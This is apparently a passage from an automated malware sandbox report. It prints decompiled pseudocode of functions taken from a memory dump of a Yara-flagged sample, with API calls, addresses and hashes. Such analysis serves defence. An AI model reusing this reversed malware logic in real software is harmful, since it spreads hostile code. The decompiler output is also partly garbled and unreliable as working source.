						_t13 =  *_t25(_t20, 0x8003, _t28 + (E0040A480( &_v68, _t37, 1, 8, _t13) & 0x000000ff) - 0x40);
					}
				}
				return _t13;
			}












                                          0x00408308
                                          0x00408309
                                          0x0040830b
                                          0x0040830d
                                          0x0040830f
                                          0x00408311
                                          0x0040831f
                                          0x00408323
                                          0x0040832e
                                          0x00408339
                                          0x0040833a
                                          0x0040833d
                                          0x0040833e
                                          0x0040834e
                                          0x00408353
                                          0x0040835a
                                          0x0040835d
                                          0x0040836a
                                          0x0040836c
                                          0x0040836e
                                          0x0040838b
                                          0x0040838b
                                          0x0040838d
                                          0x00408392

                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                          Memory Dump Source
                                          • Source File: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 022309b0a114641dc96f8a158e41957f58ce770008af985295b9c71f3e941b7b
                                          • Instruction ID: 132a2729910248c5b9012028b4aafaa8e1e309429eb340b99b16db9d9163147e
                                          • Opcode Fuzzy Hash: 022309b0a114641dc96f8a158e41957f58ce770008af985295b9c71f3e941b7b
                                          • Instruction Fuzzy Hash: F801F93198032876E720AA918C43FEE7728AF41B54F14012EFF04BA1C1E6F9290647E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408310, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 55%
                                          			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				void* _t24;
				intOrPtr* _t25;
				void* _t26;

				_v68 = 0;
				E0041BE60( &_v67, 0, 0x3f);
				E0041CA00( &_v68, 3);
				_push( &_v68);
				_t24 = _a4 + 0x1c;
				_push(_t24); // executed
				_t12 = E0040ACF0(); // executed
				_t13 = E00414E50(_t24, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A480( &_v68, _t33, 1, 8, _t14) & 0x000000ff) - 0x40);
					}
					return _t14;
				}
				return _t13;
			}












                                          0x0040831f
                                          0x00408323
                                          0x0040832e
                                          0x00408339
                                          0x0040833a
                                          0x0040833d
                                          0x0040833e
                                          0x0040834e
                                          0x00408353
                                          0x0040835a
                                          0x0040835d
                                          0x0040836a
                                          0x0040836c
                                          0x0040836e
                                          0x0040838b
                                          0x0040838b
                                          0x00000000
                                          0x0040838d
                                          0x00408392

                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                          Memory Dump Source
                                          • Source File: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 2d1f258feb65caa57005a4ca8181d3a83820067681332b4e8454df4711668a76
                                          • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                          • Opcode Fuzzy Hash: 2d1f258feb65caa57005a4ca8181d3a83820067681332b4e8454df4711668a76
                                          • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408393, Relevance: 1.5, APIs: 1, Instructions: 44threadwindowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 73%
                                          			E00408393(signed int __edx, void* __edi, char _a1, intOrPtr _a8, long _a12, char* _a16, int _a20) {
				char* _v4;
				char* _v8;
				char* _v132;
				char* _v136;
				char _v656;
				char* _v668;
				char _v680;
				char* _v684;
				char _v688;
				char* __ebx;
				int __esi;
				void* _t61;
				int _t62;
				void* _t68;
				long _t69;
				void* _t71;
				int _t72;
				void* _t74;

				_t66 = __edx;
				_t68 = __edi - 1;
				asm("pushad");
				_t1 = _t68 - 0x4273c49d;
				 *_t1 =  *(_t68 - 0x4273c49d) & __edx;
				asm("scasb");
				if( *_t1 < 0) {
					_push(_t71); // executed
					_t61 = E0040ACF0(); // executed
					_t62 = E00414E50(_t71, _t61, 0, 0, 0xc4e7b6d6);
					_t72 = _t62;
					if(_t72 != 0) {
						_push(_t68);
						_t69 = _a12;
						_t62 = PostThreadMessageW(_t69, 0x111, 0, 0); // executed
						_t82 = _t62;
						if(_t62 == 0) {
							_t62 =  *_t72(_t69, 0x8003, _t74 + (E0040A480(_t66, _t82, 1, 8, _t62) & 0x000000ff) - 0x40);
						}
					}
					return _t62;
				} else {
					__ebp =  &_a1;
					__eflags = __ebp;
					_pop(ss);
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp - 0x2ac;
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					__eax = 0;
					_v4 = 0;
					_v684 = 0;
					 &_v680 = E0041BE60( &_v680, 0, 0x2a4);
					__esi = _a20;
					__ecx =  *((intOrPtr*)(__esi + 0x300));
					__edi = _a8;
					__eax = E00408310(__eflags, _a8,  *((intOrPtr*)(__esi + 0x300))); // executed
					__eax = E0041B750(__ecx);
					_t14 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
					__ebx = __eax + _t14;
					_a20 = 0;
					while(1) {
						__eax = E0040F670(__edi, 0xfe363c80); // executed
						__ecx =  *((intOrPtr*)(__esi + 0x2f4));
						__eax =  &_v688;
						__eax = E0041A500(__edi,  *((intOrPtr*)(__esi + 0x2f4)), __ebx,  &_v688, 0x2a8, 0); // executed
						 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
						__eflags = __eax;
						if(__eax < 0) {
							break;
						}
						__eflags = _v656;
						if(_v656 == 0) {
							L13:
							__eax = _a16;
							__eax = _a16 + 1;
							_a16 = __eax;
							__eflags = __eax - 2;
							if(__eax < 2) {
								continue;
							} else {
								__ebx = _v8;
								goto L17;
							}
						} else {
							__eflags = _v668;
							if(_v668 == 0) {
								goto L13;
							} else {
								__eflags = _v136;
								if(_v136 == 0) {
									goto L13;
								} else {
									__eflags = _v132;
									if(_v132 != 0) {
										__eax = _a12;
										__edx =  &_v688;
										__ebx = 1;
										__eax = E0041BDE0(_a12,  &_v688, 0x2a8);
										L17:
										__ecx =  *((intOrPtr*)(__esi + 0x2f4));
										__eax = E0041A490(__edi,  *((intOrPtr*)(__esi + 0x2f4))); // executed
										__eflags = __ebx;
										if(__ebx == 0) {
											break;
										} else {
											__edx = _v668;
											__eax = _a12;
											__ecx = _v136;
											 *((intOrPtr*)(_a12 + 0x14)) = _v668;
											__edx =  *((intOrPtr*)(__esi + 0x2d0));
											_t34 = __esi + 0x2e8; // 0x2e8
											__eax = _t34;
											 *_t34 = _v136;
											__eax = _a12;
											_t36 = __esi + 0x314; // 0x314
											__ebx = _t36;
											__ecx = 0;
											__eax = _a12 + 0x220;
											 *__ebx = 0x18;
											 *((intOrPtr*)(__esi + 0x318)) = 0;
											 *((intOrPtr*)(__esi + 0x320)) = 0;
											 *((intOrPtr*)(__esi + 0x31c)) = 0;
											 *((intOrPtr*)(__esi + 0x324)) = 0;
											 *((intOrPtr*)(__esi + 0x328)) = 0;
											__eax = E00419D10(__edi, _a12 + 0x220,  *((intOrPtr*)(__esi + 0x2d0)), __ebx, _a12 + 0x220);
											__ecx = 0;
											 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
											__eflags = __eax;
											if(__eax < 0) {
												break;
											} else {
												__edx = _v132;
												_t44 = __esi + 0x2e0; // 0x2e0
												__eax = _t44;
												 *((intOrPtr*)(__esi + 0x318)) = 0;
												 *((intOrPtr*)(__esi + 0x320)) = 0;
												 *((intOrPtr*)(__esi + 0x31c)) = 0;
												 *((intOrPtr*)(__esi + 0x324)) = 0;
												 *((intOrPtr*)(__esi + 0x328)) = 0;
												_a12 = _a12 + 0x224;
												 *((intOrPtr*)(__esi + 0x2e4)) = _v132;
												 *__ebx = 0x18;
												 *((intOrPtr*)(__esi + 0x2d0)) = 0x1a;
												__eax = E00419D50(__edi, _a12 + 0x224, 0x1a, __ebx, _t44);
												 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
												__eflags = __eax;
												if(__eax < 0) {
													break;
												} else {
													__edx = _a8;
													 *((intOrPtr*)(__edx + 0x10)) =  *((intOrPtr*)(__edx + 0x10)) + 0x200;
													__eflags =  *((intOrPtr*)(__edx + 0x10)) + 0x200;
													__eax = E0041B3F0(__ecx);
													__ebx = __eax;
													__eax =  *((intOrPtr*)(__ebx + 0x28));
													__eax = E0041C0D0( *((intOrPtr*)(__ebx + 0x28)));
													__edx =  *((intOrPtr*)(__ebx + 0x28));
													_t59 = __eax + 2; // 0x2
													__ecx = __eax + _t59;
													__eax =  &_v656;
													__eax = E00414A50(__edi,  &_v656, 2, 0); // executed
													_pop(__edi);
													_pop(__esi);
													_pop(__ebx);
													__esp = __ebp;
													_pop(__ebp);
													return __eax;
												}
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						goto L21;
					}
					_pop(__edi);
					_pop(__esi);
					__eax = 0;
					__eflags = 0;
					_pop(__ebx);
					__esp = __ebp;
					_pop(__ebp);
					return 0;
				}
				L21:
			}





















                                          0x00408393
                                          0x00408393
                                          0x00408394
                                          0x00408395
                                          0x00408395
                                          0x0040839b
                                          0x0040839c
                                          0x0040833d
                                          0x0040833e
                                          0x0040834e
                                          0x00408353
                                          0x0040835a
                                          0x0040835c
                                          0x0040835d
                                          0x0040836a
                                          0x0040836c
                                          0x0040836e
                                          0x0040838b
                                          0x0040838b
                                          0x0040838d
                                          0x00408392
                                          0x0040839e
                                          0x0040839e
                                          0x0040839e
                                          0x0040839f
                                          0x004083a0
                                          0x004083a1
                                          0x004083a3
                                          0x004083a9
                                          0x004083aa
                                          0x004083ab
                                          0x004083ac
                                          0x004083b4
                                          0x004083b7
                                          0x004083c4
                                          0x004083c9
                                          0x004083cc
                                          0x004083d2
                                          0x004083d7
                                          0x004083df
                                          0x004083ea
                                          0x004083ea
                                          0x004083f1
                                          0x00408400
                                          0x00408406
                                          0x0040840b
                                          0x00408418
                                          0x00408422
                                          0x0040842a
                                          0x00408430
                                          0x00408432
                                          0x00000000
                                          0x00000000
                                          0x00408434
                                          0x0040843c
                                          0x00408456
                                          0x00408456
                                          0x00408459
                                          0x0040845a
                                          0x0040845d
                                          0x00408460
                                          0x00000000
                                          0x00408462
                                          0x00408462
                                          0x00000000
                                          0x00408462
                                          0x0040843e
                                          0x0040843e
                                          0x00408445
                                          0x00000000
                                          0x00408447
                                          0x00408447
                                          0x0040844e
                                          0x00000000
                                          0x00408450
                                          0x00408450
                                          0x00408454
                                          0x00408470
                                          0x00408478
                                          0x00408480
                                          0x00408485
                                          0x0040848d
                                          0x0040848d
                                          0x00408495
                                          0x0040849d
                                          0x0040849f
                                          0x00000000
                                          0x004084a1
                                          0x004084a1
                                          0x004084a7
                                          0x004084aa
                                          0x004084b0
                                          0x004084b3
                                          0x004084b9
                                          0x004084b9
                                          0x004084c0
                                          0x004084c2
                                          0x004084c5
                                          0x004084c5
                                          0x004084cc
                                          0x004084cf
                                          0x004084d6
                                          0x004084dc
                                          0x004084e2
                                          0x004084e8
                                          0x004084ee
                                          0x004084f4
                                          0x004084fa
                                          0x004084ff
                                          0x00408504
                                          0x0040850a
                                          0x0040850c
                                          0x00000000
                                          0x00408512
                                          0x00408512
                                          0x00408515
                                          0x00408515
                                          0x0040851c
                                          0x00408522
                                          0x00408528
                                          0x0040852e
                                          0x00408534
                                          0x00408540
                                          0x00408548
                                          0x0040854e
                                          0x00408554
                                          0x0040855e
                                          0x00408566
                                          0x0040856c
                                          0x0040856e
                                          0x00000000
                                          0x00408574
                                          0x00408574
                                          0x0040857a
                                          0x0040857a
                                          0x00408580
                                          0x0040858d
                                          0x0040858f
                                          0x00408593
                                          0x00408598
                                          0x0040859b
                                          0x0040859b
                                          0x004085ab
                                          0x004085b3
                                          0x004085bb
                                          0x004085bc
                                          0x004085bd
                                          0x004085be
                                          0x004085c0
                                          0x004085c1
                                          0x004085c1
                                          0x0040856e
                                          0x0040850c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00408454
                                          0x0040844e
                                          0x00408445
                                          0x00000000
                                          0x0040843c
                                          0x00408467
                                          0x00408468
                                          0x00408469
                                          0x00408469
                                          0x0040846b
                                          0x0040846c
                                          0x0040846e
                                          0x0040846f
                                          0x0040846f
                                          0x00000000

                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                          Memory Dump Source
                                          • Source File: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 21c64e26b1d5ed772856a6d2b5f4544b7c2b723b138970cbbcd9895167361a24
                                          • Instruction ID: 136ec33444ff271f2d67ddc59ad6b24b8eb5b97cd6d39456900d21724dd85dd8
                                          • Opcode Fuzzy Hash: 21c64e26b1d5ed772856a6d2b5f4544b7c2b723b138970cbbcd9895167361a24
                                          • Instruction Fuzzy Hash: E6F0E23178133832E22115916D03FBE6B08DB81F65F14016EFF48F91C1E9E9281202EA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A670, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041A670(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AF60(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                          0x0041a67f
                                          0x0041a687
                                          0x0041a69d
                                          0x0041a6a1

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                          Memory Dump Source
                                          • Source File: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                          • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                          • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A7D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041A7D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041AF60(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                          0x0041a7ea
                                          0x0041a800
                                          0x0041a804

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                          Memory Dump Source
                                          • Source File: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                          • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                          • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A6A2, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041A6A2(intOrPtr _a4, int _a8) {
				void* _t17;

				 *0x555908dc =  *0x555908dc >> 1;
				_t6 = _a4;
				E0041AF60(_t17, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t6 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                          0x0041a6ab
                                          0x0041a6b3
                                          0x0041a6ca
                                          0x0041a6d8

                                          APIs
                                          • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A6D8
                                          Memory Dump Source
                                          • Source File: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: b22859cd8cde9127c43d838a16605f2588f6efb8e8f58cd72203cb807730f872
                                          • Instruction ID: 45c8ba8b1dbd29e5d4b6212f27cc3fcbf99be4086100888ebc46f86a6bd8a2f7
                                          • Opcode Fuzzy Hash: b22859cd8cde9127c43d838a16605f2588f6efb8e8f58cd72203cb807730f872
                                          • Instruction Fuzzy Hash: C6E04F71610204ABD324DF65CC85ED737B8EF49750F158099B9496F282C531A941CBD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A6B0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041A6B0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AF60(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                          0x0041a6b3
                                          0x0041a6ca
                                          0x0041a6d8

                                          APIs
                                          • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A6D8
                                          Memory Dump Source
                                          • Source File: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                          • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                          • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 007626F8, Relevance: .0, Instructions: 44COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                          • Instruction ID: ab1802f158d8aa7712317ec0acd3d101598edf5f52bec096fe63f183e6ec9e40
                                          • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                          • Instruction Fuzzy Hash: 2DF0C821314959DBD789EB189D55E6A33D5EB94300F58C439EE4AC7343D539ED428290
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00416CDC, Relevance: .0, Instructions: 23COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8937d7aa172e7a3a908e6b2bd45b35d70bcb9e87e281f358fd4d593c23a179f5
                                          • Instruction ID: d4b9b3a67f98a686d682bb9f3b19543c6b3587b7a145980a2be96f1e08bfab72
                                          • Opcode Fuzzy Hash: 8937d7aa172e7a3a908e6b2bd45b35d70bcb9e87e281f358fd4d593c23a179f5
                                          • Instruction Fuzzy Hash: 8CD02262A924144996120D27AE004F4F7F4EA43822F0023ABC88CEB000E223C40A028C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00750060, Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                          • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                          • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                          • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 007510D0, Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                          • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                          • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                          • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00751148, Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                          • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                          • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                          • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0075010C, Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                          • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                          • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                          • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 007501D4, Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                          • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                          • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                          • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 007507AC, Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
